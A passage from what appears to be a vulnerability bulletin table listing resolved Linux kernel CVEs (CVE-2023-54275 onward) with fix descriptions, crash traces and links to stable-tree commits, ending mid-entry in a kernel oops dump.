| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: Fix memory leak in ath11k_peer_rx_frag_setup crypto_alloc_shash() allocates resources, which should be released by crypto_free_shash(). When ath11k_peer_find() fails, there has memory leak. Add missing crypto_free_shash() to fix this. | 2025-12-30 | not yet calculated | CVE-2023-54275 | https://git.kernel.org/stable/c/137963e3b95776f1d57c62f249a93fe47e019a22 https://git.kernel.org/stable/c/53c8a256e5d3f31d80186de03a3d2a7f747b2aa0 https://git.kernel.org/stable/c/e596b36e15a7158b0bb2d55077b6b381ee41020c https://git.kernel.org/stable/c/64a78ec4f4579798d8e885aca9bdd707bca6b16b https://git.kernel.org/stable/c/ed3f83b3459a67a3ab9d806490ac304b567b1c2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: move init of percpu reply_cache_stats counters back to nfsd_init_net Commit f5f9d4a314da ("nfsd: move reply cache initialization into nfsd startup") moved the initialization of the reply cache into nfsd startup, but didn't account for the stats counters, which can be accessed before nfsd is ever started. The result can be a NULL pointer dereference when someone accesses /proc/fs/nfsd/reply_cache_stats while nfsd is still shut down. This is a regression and a user-triggerable oops in the right situation: - non-x86_64 arch - /proc/fs/nfsd is mounted in the namespace - nfsd is not started in the namespace - unprivileged user calls "cat /proc/fs/nfsd/reply_cache_stats" Although this is easy to trigger on some arches (like aarch64), on x86_64, calling this_cpu_ptr(NULL) evidently returns a pointer to the fixed_percpu_data. That struct looks just enough like a newly initialized percpu var to allow nfsd_reply_cache_stats_show to access it without Oopsing. Move the initialization of the per-net+per-cpu reply-cache counters back into nfsd_init_net, while leaving the rest of the reply cache allocations to be done at nfsd startup time. Kudos to Eirik who did most of the legwork to track this down. | 2025-12-30 | not yet calculated | CVE-2023-54276 | https://git.kernel.org/stable/c/3025d489f9c8984d1bf5916c4a20097ed80fca5c https://git.kernel.org/stable/c/8549384d0f65981761fe2077d04fa2a8d37b54e0 https://git.kernel.org/stable/c/66a178177b2b3bb1d71e854c5e7bbb320eb0e566 https://git.kernel.org/stable/c/768c408594b52d8531e1a8ab62e5620c19213e73 https://git.kernel.org/stable/c/ed9ab7346e908496816cffdecd46932035f66e2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: udlfb: Fix endpoint check The syzbot fuzzer detected a problem in the udlfb driver, caused by an endpoint not having the expected type: usb 1-1: Read EDID byte 0 failed: -71 usb 1-1: Unable to get valid EDID from device/display ------------[ cut here ]------------ usb 1-1: BOGUS urb xfer, pipe 3 != type 1 WARNING: CPU: 0 PID: 9 at drivers/usb/core/urb.c:504 usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 Modules linked in: CPU: 0 PID: 9 Comm: kworker/0:1 Not tainted 6.4.0-rc1-syzkaller-00016-ga4422ff22142 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/28/2023 Workqueue: usb_hub_wq hub_event RIP: 0010:usb_submit_urb+0xed6/0x1880 drivers/usb/core/urb.c:504 ... Call Trace: <TASK> dlfb_submit_urb+0x92/0x180 drivers/video/fbdev/udlfb.c:1980 dlfb_set_video_mode+0x21f0/0x2950 drivers/video/fbdev/udlfb.c:315 dlfb_ops_set_par+0x2a7/0x8d0 drivers/video/fbdev/udlfb.c:1111 dlfb_usb_probe+0x149a/0x2710 drivers/video/fbdev/udlfb.c:1743 The current approach for this issue failed to catch the problem because it only checks for the existence of a bulk-OUT endpoint; it doesn't check whether this endpoint is the one that the driver will actually use. We can fix the problem by instead checking that the endpoint used by the driver does exist and is bulk-OUT. | 2025-12-30 | not yet calculated | CVE-2023-54277 | https://git.kernel.org/stable/c/1522dc58bff87af79461b96d90ec122e9e726004 https://git.kernel.org/stable/c/58ecc165abdaed85447455e6dc396758e8c6f219 https://git.kernel.org/stable/c/9e12c58a5ece41be72157cef348576b135c9fc72 https://git.kernel.org/stable/c/c8fdf7feca77cd99e25ef0a1e9e72dfc83add8ef https://git.kernel.org/stable/c/e19383e5dee5adbf3d19f3f210f440a88d1b7dde https://git.kernel.org/stable/c/ed9de4ed39875706607fb08118a58344ae6c5f42 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/vmem: split pages when debug pagealloc is enabled Since commit bb1520d581a3 ("s390/mm: start kernel with DAT enabled") the kernel crashes early during boot when debug pagealloc is enabled: mem auto-init: stack:off, heap alloc:off, heap free:off addressing exception: 0005 ilc:2 [#1] SMP DEBUG_PAGEALLOC Modules linked in: CPU: 0 PID: 0 Comm: swapper Not tainted 6.5.0-rc3-09759-gc5666c912155 #630 [..] Krnl Code: 00000000001325f6: ec5600248064 cgrj %r5,%r6,8,000000000013263e 00000000001325fc: eb880002000c srlg %r8,%r8,2 #0000000000132602: b2210051 ipte %r5,%r1,%r0,0 >0000000000132606: b90400d1 lgr %r13,%r1 000000000013260a: 41605008 la %r6,8(%r5) 000000000013260e: a7db1000 aghi %r13,4096 0000000000132612: b221006d ipte %r6,%r13,%r0,0 0000000000132616: e3d0d0000171 lay %r13,4096(%r13) Call Trace: __kernel_map_pages+0x14e/0x320 __free_pages_ok+0x23a/0x5a8) free_low_memory_core_early+0x214/0x2c8 memblock_free_all+0x28/0x58 mem_init+0xb6/0x228 mm_core_init+0xb6/0x3b0 start_kernel+0x1d2/0x5a8 startup_continue+0x36/0x40 Kernel panic - not syncing: Fatal exception: panic_on_oops This is caused by using large mappings on machines with EDAT1/EDAT2. Add the code to split the mappings into 4k pages if debug pagealloc is enabled by CONFIG_DEBUG_PAGEALLOC_ENABLE_DEFAULT or the debug_pagealloc kernel command line option. | 2025-12-30 | not yet calculated | CVE-2023-54278 | https://git.kernel.org/stable/c/601e467e29a960f7ab7ec4075afc6a68c3532a65 https://git.kernel.org/stable/c/edc1e4b6e26536868ef819a735e04a5b32c10589 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: fw: Allow firmware to pass a empty env fw_getenv will use env entry to determine style of env, however it is legal for firmware to just pass a empty list. Check if first entry exist before running strchr to avoid null pointer dereference. | 2025-12-30 | not yet calculated | CVE-2023-54279 | https://git.kernel.org/stable/c/f334b31625683418aaa2a335470eec950a95a254 https://git.kernel.org/stable/c/830181ddced5a05a711dc9da8043203b1f33a77e https://git.kernel.org/stable/c/0f91290774c798199ba4b8df93de5c3156b5163d https://git.kernel.org/stable/c/47e61cadc7a5f3dffd42d2d6fda81be163f1ab82 https://git.kernel.org/stable/c/3ef93b7bd9e042db240843f24a80e14da38c6830 https://git.kernel.org/stable/c/a6b54af407873227caef6262e992f5422cdcb6ae https://git.kernel.org/stable/c/ad79828f133e98585ab2236cad04a55eb7141bbe https://git.kernel.org/stable/c/aeed787bbbbe1b842beec9a065a36c915226f704 https://git.kernel.org/stable/c/ee1809ed7bc456a72dc8410b475b73021a3a68d5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix potential race when tree connecting ipc Protect access of TCP_Server_Info::hostname when building the ipc tree name as it might get freed in cifsd thread and thus causing an use-after-free bug in __tree_connect_dfs_target(). Also, while at it, update status of IPC tcon on success and then avoid any extra tree connects. | 2025-12-30 | not yet calculated | CVE-2023-54280 | https://git.kernel.org/stable/c/536ec71ba060a02fabe8e22cecb82fe7b3a8708b https://git.kernel.org/stable/c/553476df55a111e6a66ad9155256aec0ec1b7ad0 https://git.kernel.org/stable/c/ee20d7c6100752eaf2409d783f4f1449c29ea33d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: release path before inode lookup during the ino lookup ioctl During the ino lookup ioctl we can end up calling btrfs_iget() to get an inode reference while we are holding on a root's btree. If btrfs_iget() needs to lookup the inode from the root's btree, because it's not currently loaded in memory, then it will need to lock another or the same path in the same root btree. This may result in a deadlock and trigger the following lockdep splat: WARNING: possible circular locking dependency detected 6.5.0-rc7-syzkaller-00004-gf7757129e3de #0 Not tainted ------------------------------------------------------ syz-executor277/5012 is trying to acquire lock: ffff88802df41710 (btrfs-tree-01){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 but task is already holding lock: ffff88802df418e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -> #1 (btrfs-tree-00){++++}-{3:3}: down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645 __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 btrfs_search_slot+0x13a4/0x2f80 fs/btrfs/ctree.c:2302 btrfs_init_root_free_objectid+0x148/0x320 fs/btrfs/disk-io.c:4955 btrfs_init_fs_root fs/btrfs/disk-io.c:1128 [inline] btrfs_get_root_ref+0x5ae/0xae0 fs/btrfs/disk-io.c:1338 btrfs_get_fs_root fs/btrfs/disk-io.c:1390 [inline] open_ctree+0x29c8/0x3030 fs/btrfs/disk-io.c:3494 btrfs_fill_super+0x1c7/0x2f0 fs/btrfs/super.c:1154 btrfs_mount_root+0x7e0/0x910 fs/btrfs/super.c:1519 legacy_get_tree+0xef/0x190 fs/fs_context.c:611 vfs_get_tree+0x8c/0x270 fs/super.c:1519 fc_mount fs/namespace.c:1112 [inline] vfs_kern_mount+0xbc/0x150 fs/namespace.c:1142 btrfs_mount+0x39f/0xb50 fs/btrfs/super.c:1579 legacy_get_tree+0xef/0x190 fs/fs_context.c:611 vfs_get_tree+0x8c/0x270 fs/super.c:1519 do_new_mount+0x28f/0xae0 fs/namespace.c:3335 do_mount fs/namespace.c:3675 [inline] __do_sys_mount fs/namespace.c:3884 [inline] __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd -> #0 (btrfs-tree-01){++++}-{3:3}: check_prev_add kernel/locking/lockdep.c:3142 [inline] check_prevs_add kernel/locking/lockdep.c:3261 [inline] validate_chain kernel/locking/lockdep.c:3876 [inline] __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144 lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761 down_read_nested+0x49/0x2f0 kernel/locking/rwsem.c:1645 __btrfs_tree_read_lock+0x2f/0x220 fs/btrfs/locking.c:136 btrfs_tree_read_lock fs/btrfs/locking.c:142 [inline] btrfs_read_lock_root_node+0x292/0x3c0 fs/btrfs/locking.c:281 btrfs_search_slot_get_root fs/btrfs/ctree.c:1832 [inline] btrfs_search_slot+0x4ff/0x2f80 fs/btrfs/ctree.c:2154 btrfs_lookup_inode+0xdc/0x480 fs/btrfs/inode-item.c:412 btrfs_read_locked_inode fs/btrfs/inode.c:3892 [inline] btrfs_iget_path+0x2d9/0x1520 fs/btrfs/inode.c:5716 btrfs_search_path_in_tree_user fs/btrfs/ioctl.c:1961 [inline] btrfs_ioctl_ino_lookup_user+0x77a/0xf50 fs/btrfs/ioctl.c:2105 btrfs_ioctl+0xb0b/0xd40 fs/btrfs/ioctl.c:4683 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:870 [inline] __se_sys_ioctl+0xf8/0x170 fs/ioctl.c:856 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd other info ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54281 | https://git.kernel.org/stable/c/7390bb377b5fb3be23cb021e0f184d1f576be7d6 https://git.kernel.org/stable/c/380bbd46d61c894a8dcaace09e54bc7426d81014 https://git.kernel.org/stable/c/50e385d98b2a52480836ea41c142b81eeeb277af https://git.kernel.org/stable/c/6fdce81e425be112f1ca129776f4041afeaad413 https://git.kernel.org/stable/c/ee34a82e890a7babb5585daf1a6dd7d4d1cf142a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: tuners: qt1010: replace BUG_ON with a regular error BUG_ON is unnecessary here, and in addition it confuses smatch. Replacing this with an error return help resolve this smatch warning: drivers/media/tuners/qt1010.c:350 qt1010_init() error: buffer overflow 'i2c_data' 34 <= 34 | 2025-12-30 | not yet calculated | CVE-2023-54282 | https://git.kernel.org/stable/c/6cae780862d221106626b2b5fb21a197f398c6ec https://git.kernel.org/stable/c/f844bc3a47d8d1c55a4a9cfca38c538e9df7e678 https://git.kernel.org/stable/c/641e60223971e95472a2a9646b1e7f94d441de45 https://git.kernel.org/stable/c/2ae53dd15eef90d34fc084b5b2305a67bb675a26 https://git.kernel.org/stable/c/48bb6a9fa5cb150ac2a22b3c779c96bc0ed21071 https://git.kernel.org/stable/c/257092cb544c7843376b3e161f789e666ef06c98 https://git.kernel.org/stable/c/1a6bf53fffe0b7ebe2a0f402b44f14f90cffd164 https://git.kernel.org/stable/c/ee630b29ea44d1851bb6c903f400956604834463 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Address KCSAN report on bpf_lru_list KCSAN reported a data-race when accessing node->ref. Although node->ref does not have to be accurate, take this chance to use a more common READ_ONCE() and WRITE_ONCE() pattern instead of data_race(). There is an existing bpf_lru_node_is_ref() and bpf_lru_node_set_ref(). This patch also adds bpf_lru_node_clear_ref() to do the WRITE_ONCE(node->ref, 0) also. ================================================================== BUG: KCSAN: data-race in __bpf_lru_list_rotate / __htab_lru_percpu_map_update_elem write to 0xffff888137038deb of 1 bytes by task 11240 on cpu 1: __bpf_lru_node_move kernel/bpf/bpf_lru_list.c:113 [inline] __bpf_lru_list_rotate_active kernel/bpf/bpf_lru_list.c:149 [inline] __bpf_lru_list_rotate+0x1bf/0x750 kernel/bpf/bpf_lru_list.c:240 bpf_lru_list_pop_free_to_local kernel/bpf/bpf_lru_list.c:329 [inline] bpf_common_lru_pop_free kernel/bpf/bpf_lru_list.c:447 [inline] bpf_lru_pop_free+0x638/0xe20 kernel/bpf/bpf_lru_list.c:499 prealloc_lru_pop kernel/bpf/hashtab.c:290 [inline] __htab_lru_percpu_map_update_elem+0xe7/0x820 kernel/bpf/hashtab.c:1316 bpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313 bpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200 generic_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687 bpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534 __sys_bpf+0x338/0x810 __do_sys_bpf kernel/bpf/syscall.c:5096 [inline] __se_sys_bpf kernel/bpf/syscall.c:5094 [inline] __x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd read to 0xffff888137038deb of 1 bytes by task 11241 on cpu 0: bpf_lru_node_set_ref kernel/bpf/bpf_lru_list.h:70 [inline] __htab_lru_percpu_map_update_elem+0x2f1/0x820 kernel/bpf/hashtab.c:1332 bpf_percpu_hash_update+0x5e/0x90 kernel/bpf/hashtab.c:2313 bpf_map_update_value+0x2a9/0x370 kernel/bpf/syscall.c:200 generic_map_update_batch+0x3ae/0x4f0 kernel/bpf/syscall.c:1687 bpf_map_do_batch+0x2d9/0x3d0 kernel/bpf/syscall.c:4534 __sys_bpf+0x338/0x810 __do_sys_bpf kernel/bpf/syscall.c:5096 [inline] __se_sys_bpf kernel/bpf/syscall.c:5094 [inline] __x64_sys_bpf+0x43/0x50 kernel/bpf/syscall.c:5094 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd value changed: 0x01 -> 0x00 Reported by Kernel Concurrency Sanitizer on: CPU: 0 PID: 11241 Comm: syz-executor.3 Not tainted 6.3.0-rc7-syzkaller-00136-g6a66fdd29ea1 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/30/2023 ================================================================== | 2025-12-30 | not yet calculated | CVE-2023-54283 | https://git.kernel.org/stable/c/6eaef1b1d8720053eb1b6e7a3ff8b2ff0716bb90 https://git.kernel.org/stable/c/a89d14410ea0352420f03cddc67e0002dcc8f9a5 https://git.kernel.org/stable/c/e09a285ea1e859d4cc6cb689d8d5d7c1f7c7c0d5 https://git.kernel.org/stable/c/b6d9a4062c944ad095b34dc112bf646a84156f60 https://git.kernel.org/stable/c/819ca25444b377935faa2dbb0aa3547519b5c80f https://git.kernel.org/stable/c/c006fe361cfd947f51a56793deddf891e5cbfef8 https://git.kernel.org/stable/c/6e5e83b56f50fbd1c8f7dca7df7d72c67be25571 https://git.kernel.org/stable/c/ee9fd0ac3017c4313be91a220a9ac4c99dde7ad4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: av7110: prevent underflow in write_ts_to_decoder() The buf[4] value comes from the user via ts_play(). It is a value in the u8 range. The final length we pass to av7110_ipack_instant_repack() is "len - (buf[4] + 1) - 4" so add a check to ensure that the length is not negative. It's not clear that passing a negative len value does anything bad necessarily, but it's not best practice. With the new bounds checking the "if (!len)" condition is no longer possible or required so remove that. | 2025-12-30 | not yet calculated | CVE-2023-54284 | https://git.kernel.org/stable/c/6680af5be9f08d830567e9118f76d3e64684db8f https://git.kernel.org/stable/c/6606e2404ee9e20a3ae5b42fc3660d41b739ed3e https://git.kernel.org/stable/c/620b983589e0223876bf1463b01100a9c67b56ba https://git.kernel.org/stable/c/86ba65e5357bfbb6c082f68b265a292ee1bdde1d https://git.kernel.org/stable/c/ca4ce92e3ec9fd3c7c936b912b95c53331d5159c https://git.kernel.org/stable/c/423350af9e27f005611bd881b1df2cab66de943d https://git.kernel.org/stable/c/77eeb4732135c18c2fdfab80839645b393f3e774 https://git.kernel.org/stable/c/7b93ab60fe9ed04be0ff155bc30ad39dea23e22b https://git.kernel.org/stable/c/eed9496a0501357aa326ddd6b71408189ed872eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iomap: Fix possible overflow condition in iomap_write_delalloc_scan folio_next_index() returns an unsigned long value which left shifted by PAGE_SHIFT could possibly cause an overflow on 32-bit system. Instead use folio_pos(folio) + folio_size(folio), which does this correctly. | 2025-12-30 | not yet calculated | CVE-2023-54285 | https://git.kernel.org/stable/c/5c281b0c5d18c8eeb1cfd5023f4adb153e6d1240 https://git.kernel.org/stable/c/eee2d2e6ea5550118170dbd5bb1316ceb38455fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: dvm: Fix memcpy: detected field-spanning write backtrace A received TKIP key may be up to 32 bytes because it may contain MIC rx/tx keys too. These are not used by iwl and copying these over overflows the iwl_keyinfo.key field. Add a check to not copy more data to iwl_keyinfo.key then will fit. This fixes backtraces like this one: memcpy: detected field-spanning write (size 32) of single field "sta_cmd.key.key" at drivers/net/wireless/intel/iwlwifi/dvm/sta.c:1103 (size 16) WARNING: CPU: 1 PID: 946 at drivers/net/wireless/intel/iwlwifi/dvm/sta.c:1103 iwlagn_send_sta_key+0x375/0x390 [iwldvm] <snip> Hardware name: Dell Inc. Latitude E6430/0H3MT5, BIOS A21 05/08/2017 RIP: 0010:iwlagn_send_sta_key+0x375/0x390 [iwldvm] <snip> Call Trace: <TASK> iwl_set_dynamic_key+0x1f0/0x220 [iwldvm] iwlagn_mac_set_key+0x1e4/0x280 [iwldvm] drv_set_key+0xa4/0x1b0 [mac80211] ieee80211_key_enable_hw_accel+0xa8/0x2d0 [mac80211] ieee80211_key_replace+0x22d/0x8e0 [mac80211] <snip> | 2025-12-30 | not yet calculated | CVE-2023-54286 | https://git.kernel.org/stable/c/76b5ea43ad2fb4f726ddfaff839430a706e7d7c2 https://git.kernel.org/stable/c/3ed3c1c2fc3482b72e755820261779cd2e2c5a3e https://git.kernel.org/stable/c/fa57021262e998e2229d6383b1081638df2fe238 https://git.kernel.org/stable/c/91ad1ab3cc7e981cb6d6ee100686baed64e1277e https://git.kernel.org/stable/c/87940e4030e4705e1f3fd2bbb1854eae8308314b https://git.kernel.org/stable/c/57189c885149825be8eb8c3524b5af017fdeb941 https://git.kernel.org/stable/c/6cd644f66b43709816561d63e0173cb0c7aab159 https://git.kernel.org/stable/c/ef16799640865f937719f0771c93be5dca18adc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: imx: disable Ageing Timer interrupt request irq There maybe pending USR interrupt before requesting irq, however uart_add_one_port has not executed, so there will be kernel panic: [ 0.795668] Unable to handle kernel NULL pointer dereference at virtual addre ss 0000000000000080 [ 0.802701] Mem abort info: [ 0.805367] ESR = 0x0000000096000004 [ 0.808950] EC = 0x25: DABT (current EL), IL = 32 bits [ 0.814033] SET = 0, FnV = 0 [ 0.816950] EA = 0, S1PTW = 0 [ 0.819950] FSC = 0x04: level 0 translation fault [ 0.824617] Data abort info: [ 0.827367] ISV = 0, ISS = 0x00000004 [ 0.831033] CM = 0, WnR = 0 [ 0.833866] [0000000000000080] user address but active_mm is swapper [ 0.839951] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP [ 0.845953] Modules linked in: [ 0.848869] CPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.1.1+g56321e101aca #1 [ 0.855617] Hardware name: Freescale i.MX8MP EVK (DT) [ 0.860452] pstate: 000000c5 (nzcv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 0.867117] pc : __imx_uart_rxint.constprop.0+0x11c/0x2c0 [ 0.872283] lr : imx_uart_int+0xf8/0x1ec The issue only happends in the inmate linux when Jailhouse hypervisor enabled. The test procedure is: while true; do jailhouse enable imx8mp.cell jailhouse cell linux xxxx sleep 10 jailhouse cell destroy 1 jailhouse disable sleep 5 done And during the upper test, press keys to the 2nd linux console. When `jailhouse cell destroy 1`, the 2nd linux has no chance to put the uart to a quiese state, so USR1/2 may has pending interrupts. Then when `jailhosue cell linux xx` to start 2nd linux again, the issue trigger. In order to disable irqs before requesting them, both UCR1 and UCR2 irqs should be disabled, so here fix that, disable the Ageing Timer interrupt in UCR2 as UCR1 does. | 2025-12-30 | not yet calculated | CVE-2023-54287 | https://git.kernel.org/stable/c/3d41d9b256ae626c0dc434427c8e32450358d3b4 https://git.kernel.org/stable/c/9795ece3a85ba9238191e97665586e2d79703ff3 https://git.kernel.org/stable/c/963875b0655197281775b0ea614aab8b6b3eb001 https://git.kernel.org/stable/c/ef25e16ea9674b713a68c3bda821556ce9901254 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: fortify the spinlock against deadlock by interrupt In the function ieee80211_tx_dequeue() there is a particular locking sequence: begin: spin_lock(&local->queue_stop_reason_lock); q_stopped = local->queue_stop_reasons[q]; spin_unlock(&local->queue_stop_reason_lock); However small the chance (increased by ftracetest), an asynchronous interrupt can occur in between of spin_lock() and spin_unlock(), and the interrupt routine will attempt to lock the same &local->queue_stop_reason_lock again. This will cause a costly reset of the CPU and the wifi device or an altogether hang in the single CPU and single core scenario. The only remaining spin_lock(&local->queue_stop_reason_lock) that did not disable interrupts was patched, which should prevent any deadlocks on the same CPU/core and the same wifi device. This is the probable trace of the deadlock: kernel: ================================ kernel: WARNING: inconsistent lock state kernel: 6.3.0-rc6-mt-20230401-00001-gf86822a1170f #4 Tainted: G W kernel: -------------------------------- kernel: inconsistent {IN-SOFTIRQ-W} -> {SOFTIRQ-ON-W} usage. kernel: kworker/5:0/25656 [HC0[0]:SC0[0]:HE1:SE1] takes: kernel: ffff9d6190779478 (&local->queue_stop_reason_lock){+.?.}-{2:2}, at: return_to_handler+0x0/0x40 kernel: {IN-SOFTIRQ-W} state was registered at: kernel: lock_acquire+0xc7/0x2d0 kernel: _raw_spin_lock+0x36/0x50 kernel: ieee80211_tx_dequeue+0xb4/0x1330 [mac80211] kernel: iwl_mvm_mac_itxq_xmit+0xae/0x210 [iwlmvm] kernel: iwl_mvm_mac_wake_tx_queue+0x2d/0xd0 [iwlmvm] kernel: ieee80211_queue_skb+0x450/0x730 [mac80211] kernel: __ieee80211_xmit_fast.constprop.66+0x834/0xa50 [mac80211] kernel: __ieee80211_subif_start_xmit+0x217/0x530 [mac80211] kernel: ieee80211_subif_start_xmit+0x60/0x580 [mac80211] kernel: dev_hard_start_xmit+0xb5/0x260 kernel: __dev_queue_xmit+0xdbe/0x1200 kernel: neigh_resolve_output+0x166/0x260 kernel: ip_finish_output2+0x216/0xb80 kernel: __ip_finish_output+0x2a4/0x4d0 kernel: ip_finish_output+0x2d/0xd0 kernel: ip_output+0x82/0x2b0 kernel: ip_local_out+0xec/0x110 kernel: igmpv3_sendpack+0x5c/0x90 kernel: igmp_ifc_timer_expire+0x26e/0x4e0 kernel: call_timer_fn+0xa5/0x230 kernel: run_timer_softirq+0x27f/0x550 kernel: __do_softirq+0xb4/0x3a4 kernel: irq_exit_rcu+0x9b/0xc0 kernel: sysvec_apic_timer_interrupt+0x80/0xa0 kernel: asm_sysvec_apic_timer_interrupt+0x1f/0x30 kernel: _raw_spin_unlock_irqrestore+0x3f/0x70 kernel: free_to_partial_list+0x3d6/0x590 kernel: __slab_free+0x1b7/0x310 kernel: kmem_cache_free+0x52d/0x550 kernel: putname+0x5d/0x70 kernel: do_sys_openat2+0x1d7/0x310 kernel: do_sys_open+0x51/0x80 kernel: __x64_sys_openat+0x24/0x30 kernel: do_syscall_64+0x5c/0x90 kernel: entry_SYSCALL_64_after_hwframe+0x72/0xdc kernel: irq event stamp: 5120729 kernel: hardirqs last enabled at (5120729): [<ffffffff9d149936>] trace_graph_return+0xd6/0x120 kernel: hardirqs last disabled at (5120728): [<ffffffff9d149950>] trace_graph_return+0xf0/0x120 kernel: softirqs last enabled at (5069900): [<ffffffff9cf65b60>] return_to_handler+0x0/0x40 kernel: softirqs last disabled at (5067555): [<ffffffff9cf65b60>] return_to_handler+0x0/0x40 kernel: other info that might help us debug this: kernel: Possible unsafe locking scenario: kernel: CPU0 kernel: ---- kernel: lock(&local->queue_stop_reason_lock); kernel: <Interrupt> kernel: lock(&local->queue_stop_reason_lock); kernel: *** DEADLOCK *** kernel: 8 locks held by kworker/5:0/25656: kernel: #0: ffff9d618009d138 ((wq_completion)events_freezable){+.+.}-{0:0}, at: process_one_work+0x1ca/0x530 kernel: #1: ffffb1ef4637fe68 ((work_completion)(&local->restart_work)){+.+.}-{0:0}, at: process_one_work+0x1ce/0x530 kernel: #2: ffffffff9f166548 (rtnl_mutex){+.+.}-{3:3}, at: return_to_handler+0x0/0x40 kernel: #3: ffff9d619 ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54288 | https://git.kernel.org/stable/c/c79d794a2cd76eca47b2491c5030be9a6418c5d6 https://git.kernel.org/stable/c/6df3eafa31b3ee4f0cba601ca857019964355034 https://git.kernel.org/stable/c/ef6e1997da63ad0ac3fe33153fec9524c9ae56c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qedf: Fix NULL dereference in error handling Smatch reported: drivers/scsi/qedf/qedf_main.c:3056 qedf_alloc_global_queues() warn: missing unwind goto? At this point in the function, nothing has been allocated so we can return directly. In particular the "qedf->global_queues" have not been allocated so calling qedf_free_global_queues() will lead to a NULL dereference when we check if (!gl[i]) and "gl" is NULL. | 2025-12-30 | not yet calculated | CVE-2023-54289 | https://git.kernel.org/stable/c/961c8370c5f7e80a267680476e1bcff34bffe71a https://git.kernel.org/stable/c/ac64019e4d4b08c23edb117e0b2590985e33de1d https://git.kernel.org/stable/c/b1de5105d29b145b727b797e2d5de071ab3a7ca1 https://git.kernel.org/stable/c/c316bde418af4c2a9df51149ed01d1bd8ca5bebf https://git.kernel.org/stable/c/08c001c1e9444a3046c79a99aa93ac48073b18cc https://git.kernel.org/stable/c/271c9b2eb60149afbeab28cb39e52f73bde9900c https://git.kernel.org/stable/c/f025312b089474a54e4859f3453771314d9e3d4f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vduse: fix NULL pointer dereference vduse_vdpa_set_vq_affinity callback can be called with NULL value as cpu_mask when deleting the vduse device. This patch resets virtqueue's IRQ affinity mask value to set all CPUs instead of dereferencing NULL cpu_mask. [ 4760.952149] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 4760.959110] #PF: supervisor read access in kernel mode [ 4760.964247] #PF: error_code(0x0000) - not-present page [ 4760.969385] PGD 0 P4D 0 [ 4760.971927] Oops: 0000 [#1] PREEMPT SMP PTI [ 4760.976112] CPU: 13 PID: 2346 Comm: vdpa Not tainted 6.4.0-rc6+ #4 [ 4760.982291] Hardware name: Dell Inc. PowerEdge R640/0W23H8, BIOS 2.8.1 06/26/2020 [ 4760.989769] RIP: 0010:memcpy_orig+0xc5/0x130 [ 4760.994049] Code: 16 f8 4c 89 07 4c 89 4f 08 4c 89 54 17 f0 4c 89 5c 17 f8 c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 83 fa 08 72 1b <4c> 8b 06 4c 8b 4c 16 f8 4c 89 07 4c 89 4c 17 f8 c3 cc cc cc cc 66 [ 4761.012793] RSP: 0018:ffffb1d565abb830 EFLAGS: 00010246 [ 4761.018020] RAX: ffff9f4bf6b27898 RBX: ffff9f4be23969c0 RCX: ffff9f4bcadf6400 [ 4761.025152] RDX: 0000000000000008 RSI: 0000000000000000 RDI: ffff9f4bf6b27898 [ 4761.032286] RBP: 0000000000000000 R08: 0000000000000008 R09: 0000000000000000 [ 4761.039416] R10: 0000000000000000 R11: 0000000000000600 R12: 0000000000000000 [ 4761.046549] R13: 0000000000000000 R14: 0000000000000080 R15: ffffb1d565abbb10 [ 4761.053680] FS: 00007f64c2ec2740(0000) GS:ffff9f635f980000(0000) 